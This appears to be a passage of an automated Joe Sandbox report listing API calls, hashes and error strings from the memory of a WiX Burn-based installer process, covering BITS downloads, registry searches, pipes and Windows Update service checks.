                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString$lstrlen
                                                                                                                • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                • API String ID: 1657112622-2492263259
                                                                                                                • Opcode ID: a98ed16c07e5ff881c59f4b2a91037ef6fde48df7b3f448d2c2784e49aaa9a43
                                                                                                                • Instruction ID: 557d951da6bb45bfca6fdc06501189da6863b791ebd2f848a2832d816ee74386
                                                                                                                • Opcode Fuzzy Hash: a98ed16c07e5ff881c59f4b2a91037ef6fde48df7b3f448d2c2784e49aaa9a43
                                                                                                                • Instruction Fuzzy Hash: FF51D43168C652BBDB214F85DC85F57BA65FB15731F204B04F638AE2E1CBA5EC508790
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AA0B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open@16
                                                                                                                • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                • API String ID: 3613110473-2134270738
                                                                                                                • Opcode ID: 03c93db02461ea97df9df5a093b65c7870010773bf13429056329639da2e33ff
                                                                                                                • Instruction ID: dba8fbd2d6834cb5e550865680a67951d112f9ad587f0c23d78446038fb4f621
                                                                                                                • Opcode Fuzzy Hash: 03c93db02461ea97df9df5a093b65c7870010773bf13429056329639da2e33ff
                                                                                                                • Instruction Fuzzy Hash: 9561E332D40159BBCB229EA9CD45FAE7B78EB8A714F200065F914BB251C336DE50D7D2
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 009B4B84
                                                                                                                • GetLastError.KERNEL32 ref: 009B4B92
                                                                                                                • Sleep.KERNEL32(00000064), ref: 009B4BB6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileLastSleep
                                                                                                                • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                                                                • API String ID: 408151869-3212458075
                                                                                                                • Opcode ID: cec826e920f06c0297d6671e2192ed2c612196a821d3053bb4d2843ca07a25ce
                                                                                                                • Instruction ID: 675cb91bb2fb4b70c5b50d5d1c3a0acb55eb47f3850429ab6506ece1a423f2ef
                                                                                                                • Opcode Fuzzy Hash: cec826e920f06c0297d6671e2192ed2c612196a821d3053bb4d2843ca07a25ce
                                                                                                                • Instruction Fuzzy Hash: 89412A36D85636BBDB2156A08E46FEF7A58AF50B30F110221FF00BB292D765AD10A7D4
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,009B04DF,InstallerVersion,InstallerVersion,00000000,009B04DF,InstallerName,InstallerName,00000000,009B04DF,Date,InstalledDate,00000000,009B04DF,LogonUser), ref: 009AF733
                                                                                                                  • Part of subcall function 009E14F4: RegSetValueExW.ADVAPI32(00020006,009F0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,009AF335,00000000,?,00020006), ref: 009E1527
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseValue
                                                                                                                • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                • API String ID: 3132538880-2703781546
                                                                                                                • Opcode ID: 4bbf723de3b80d68ec58560ddbe7a65088ac169a9ea450b4cec7c09ccd961af7
                                                                                                                • Instruction ID: 01a2e2dd6047d74f7b29613a8f6db70727b25a07c5ec8f6c63a043b3293b7041
                                                                                                                • Opcode Fuzzy Hash: 4bbf723de3b80d68ec58560ddbe7a65088ac169a9ea450b4cec7c09ccd961af7
                                                                                                                • Instruction Fuzzy Hash: 0541E932A446ADB7CF2366D4CC12FBE7A64AB92B18F150170FA00B6262D7709E10A7C4
                                                                                                                APIs
                                                                                                                • TlsSetValue.KERNEL32(?,?), ref: 009BE7FF
                                                                                                                • RegisterClassW.USER32(?), ref: 009BE82B
                                                                                                                • GetLastError.KERNEL32 ref: 009BE836
                                                                                                                • CreateWindowExW.USER32(00000080,009F9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 009BE89D
                                                                                                                • GetLastError.KERNEL32 ref: 009BE8A7
                                                                                                                • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 009BE945
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                • API String ID: 213125376-288575659
                                                                                                                • Opcode ID: 7f9d5d212e0334e78fa2041ba55dabd996440a56743c46bc3c44d4a4c9a5688f
                                                                                                                • Instruction ID: df344d4a35abfad519f4b8e7c87d670dee825376ff51370024aa45477c60719b
                                                                                                                • Opcode Fuzzy Hash: 7f9d5d212e0334e78fa2041ba55dabd996440a56743c46bc3c44d4a4c9a5688f
                                                                                                                • Instruction Fuzzy Hash: 5341B672901229ABDB218BA5DD85BDFBFBCFF08760F104125F914AB190D730AD04DBA1
                                                                                                                Strings
                                                                                                                • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 009CCAAC
                                                                                                                • Failed to copy key for passthrough pseudo bundle., xrefs: 009CC988
                                                                                                                • Failed to recreate command-line arguments., xrefs: 009CCA43
                                                                                                                • Failed to copy download source for passthrough pseudo bundle., xrefs: 009CC98F
                                                                                                                • Failed to copy related arguments for passthrough bundle package, xrefs: 009CCA82
                                                                                                                • Failed to allocate memory for pseudo bundle payload hash., xrefs: 009CC9AD
                                                                                                                • Failed to copy local source path for passthrough pseudo bundle., xrefs: 009CC9B7
                                                                                                                • Failed to copy cache id for passthrough pseudo bundle., xrefs: 009CCA05
                                                                                                                • pseudobundle.cpp, xrefs: 009CC7A8, 009CC9A1, 009CC9DB
                                                                                                                • Failed to copy key for passthrough pseudo bundle payload., xrefs: 009CC9C5
                                                                                                                • Failed to copy filename for passthrough pseudo bundle., xrefs: 009CC9BE
                                                                                                                • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 009CC9E7
                                                                                                                • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 009CC7B4
                                                                                                                • Failed to copy install arguments for passthrough bundle package, xrefs: 009CCA62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                • API String ID: 1357844191-115096447
                                                                                                                • Opcode ID: 695554d29f3c0ca1b09b4859eec4ace57f27e529b6c04cc0e712bcd7f09b7875
                                                                                                                • Instruction ID: 5bb3ba366a91d97903bba2ed627146a252122aeeb1a0d10bc3bbf1691fd749cd
                                                                                                                • Opcode Fuzzy Hash: 695554d29f3c0ca1b09b4859eec4ace57f27e529b6c04cc0e712bcd7f09b7875
                                                                                                                • Instruction Fuzzy Hash: 5CB178B5A0061AEFCB11CF28C881F56BBA5FF48714F118669FD18AB361CB31E851DB91
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 009CDE61
                                                                                                                Strings
                                                                                                                • Failed while waiting for BITS download., xrefs: 009CE012
                                                                                                                • Failed to download BITS job., xrefs: 009CDFF8
                                                                                                                • Failed to add file to BITS job., xrefs: 009CDF2E
                                                                                                                • Failed to complete BITS job., xrefs: 009CE00B
                                                                                                                • bitsengine.cpp, xrefs: 009CDE77, 009CDF6A
                                                                                                                • Failed to create BITS job callback., xrefs: 009CDF74
                                                                                                                • Invalid BITS engine URL: %ls, xrefs: 009CDE83
                                                                                                                • Failed to create BITS job., xrefs: 009CDEF0
                                                                                                                • Falied to start BITS job., xrefs: 009CE019
                                                                                                                • Failed to copy download URL., xrefs: 009CDEA8
                                                                                                                • Failed to set callback interface for BITS job., xrefs: 009CDF99
                                                                                                                • Failed to initialize BITS job callback., xrefs: 009CDF82
                                                                                                                • Failed to set credentials for BITS job., xrefs: 009CDF0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                • API String ID: 1659193697-2382896028
                                                                                                                • Opcode ID: 164085da09be0e27067bd7ec39690018d9bb608c31f8b073b1bb3ed9415aaf89
                                                                                                                • Instruction ID: 889358b851097129a5d85cea8c5147439ea54b205fd37be2a3bf536959106973
                                                                                                                • Opcode Fuzzy Hash: 164085da09be0e27067bd7ec39690018d9bb608c31f8b073b1bb3ed9415aaf89
                                                                                                                • Instruction Fuzzy Hash: 8B61D331E05229FBCB129F94C885F6E7BA4AF49B20B11455EFC06AF291D7B4DD009BD2
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009ABCE5
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 009ABDF2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009ABDFC
                                                                                                                • WaitForInputIdle.USER32(?,?), ref: 009ABE50
                                                                                                                • CloseHandle.KERNEL32(?,?,?), ref: 009ABE9B
                                                                                                                • CloseHandle.KERNEL32(?,?,?), ref: 009ABEA8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                                                                • API String ID: 155678114-2737401750
                                                                                                                • Opcode ID: fac774b0ea116b4c7ed0034973d5c4b03a99f0d627a8a83820b23416417e0414
                                                                                                                • Instruction ID: 165b20ab69b6723acf1652e145caca9734883a1faa969dab97d71e1428ea8c23
                                                                                                                • Opcode Fuzzy Hash: fac774b0ea116b4c7ed0034973d5c4b03a99f0d627a8a83820b23416417e0414
                                                                                                                • Instruction Fuzzy Hash: 0D518C72D0065ABBCF22AFD5CC42EEEBB78BF45310B104566FA14B6162E7319E509BD0
                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,009C6F28,?), ref: 009C6A0B
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009C6F28,?,?,?), ref: 009C6A18
                                                                                                                • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,009C6F28,?,?,?), ref: 009C6A60
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009C6F28,?,?,?), ref: 009C6A6C
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,009C6F28,?,?,?), ref: 009C6AA6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,009C6F28,?,?,?), ref: 009C6AB0
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 009C6B67
                                                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 009C6B71
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                • API String ID: 971853308-301359130
                                                                                                                • Opcode ID: d2e0cd7a6a09d75291af73fe9be3d1da9e9d10ac388ea4d2cf8514ae014fb9bb
                                                                                                                • Instruction ID: 643a4a8930c4fe4b05b5a04acbc9d691d656ba3a48e86062187de946f3d991d1
                                                                                                                • Opcode Fuzzy Hash: d2e0cd7a6a09d75291af73fe9be3d1da9e9d10ac388ea4d2cf8514ae014fb9bb
                                                                                                                • Instruction Fuzzy Hash: 3B41C872E45329ABD7219FA58C85FBFB7A8AB48710F118429FE01FB241D774DC009AA1
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AA2B3
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AA30E
                                                                                                                • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 009AA32F
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 009AA405
                                                                                                                Strings
                                                                                                                • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 009AA3DD
                                                                                                                • Failed to open registry key. Key = '%ls', xrefs: 009AA3C7
                                                                                                                • Registry key not found. Key = '%ls', xrefs: 009AA396
                                                                                                                • search.cpp, xrefs: 009AA360
                                                                                                                • Failed to set variable., xrefs: 009AA3BD
                                                                                                                • Failed to format key string., xrefs: 009AA2BE
                                                                                                                • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 009AA37A
                                                                                                                • Failed to query registry key value., xrefs: 009AA36A
                                                                                                                • Failed to format value string., xrefs: 009AA319
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open@16$CloseQueryValue
                                                                                                                • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                • API String ID: 2702208347-46557908
                                                                                                                • Opcode ID: d7942191bd957fccc2c9fc2ee0a416b96e9d6ffb24a950029d039cc47b468424
                                                                                                                • Instruction ID: 6d419579332b7152ba6855b017ea7747021518bd1f929b96768a5dc8458a71fc
                                                                                                                • Opcode Fuzzy Hash: d7942191bd957fccc2c9fc2ee0a416b96e9d6ffb24a950029d039cc47b468424
                                                                                                                • Instruction Fuzzy Hash: 06410632D00168BBCF235B95CC06FAFBA68EB85710F104250FD14B6152D7769E10E7D2
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,009ABAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB210
                                                                                                                • GetLastError.KERNEL32(?,009ABAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 009AB21C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandleLastModule
                                                                                                                • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                                                                • API String ID: 4242514867-926796631
                                                                                                                • Opcode ID: 851e39a7fe8ee7de9062e474e948bbcfc88984ad45609592ec63e2be4e16da11
                                                                                                                • Instruction ID: 000449e947216a7e1de5cfd500f343c7fc5e1c07a0f0fbba6ce11514463865a4
                                                                                                                • Opcode Fuzzy Hash: 851e39a7fe8ee7de9062e474e948bbcfc88984ad45609592ec63e2be4e16da11
                                                                                                                • Instruction Fuzzy Hash: 18415B32280310E7CF2219868C46F6F2654EFD7B31B25802EFD215F283DBA9CC0282E5
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 009A699B
                                                                                                                • GetLastError.KERNEL32 ref: 009A69A5
                                                                                                                • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 009A69E8
                                                                                                                • GetLastError.KERNEL32 ref: 009A69F2
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 009A6B03
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                • API String ID: 3057421322-109962352
                                                                                                                • Opcode ID: d0042670df33016f6e1dc1420a23bdef6506ed96c3ffe74df4fc4fc217625242
                                                                                                                • Instruction ID: dfc96ef89d036d8961dcf2e04d68228d14efce29df179ee0da9b506009229dcf
                                                                                                                • Opcode Fuzzy Hash: d0042670df33016f6e1dc1420a23bdef6506ed96c3ffe74df4fc4fc217625242
                                                                                                                • Instruction Fuzzy Hash: D541E372D012399BCB329F658C49BEA7BA8EB49710F044199FD48F6281E7759E80CBD0
                                                                                                                APIs
                                                                                                                • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,009A5466,?,?,?,?), ref: 009A4920
                                                                                                                • GetLastError.KERNEL32(?,?,?,009A5466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009A4931
                                                                                                                • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009A4A6E
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,009A5466,?,?,?,?,?,?,?,?,?,?,?), ref: 009A4A77
                                                                                                                Strings
                                                                                                                • Failed to connect to unelevated process., xrefs: 009A4916
                                                                                                                • Failed to set elevated pipe into thread local storage for logging., xrefs: 009A49A8
                                                                                                                • engine.cpp, xrefs: 009A4955, 009A499E
                                                                                                                • comres.dll, xrefs: 009A49DD
                                                                                                                • Failed to allocate thread local storage for logging., xrefs: 009A495F
                                                                                                                • Failed to pump messages from parent process., xrefs: 009A4A42
                                                                                                                • Failed to create the message window., xrefs: 009A49CC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                                                                                • API String ID: 687263955-1790235126
                                                                                                                • Opcode ID: 1cb5ffec1f9899da504079c78407d56f458bc0d76908ad8332060a0a040da694
                                                                                                                • Instruction ID: e7f9cc562ebb29bb39a2ce83782b0ecc7235ebcc781e11a4e95456f302905028
                                                                                                                • Opcode Fuzzy Hash: 1cb5ffec1f9899da504079c78407d56f458bc0d76908ad8332060a0a040da694
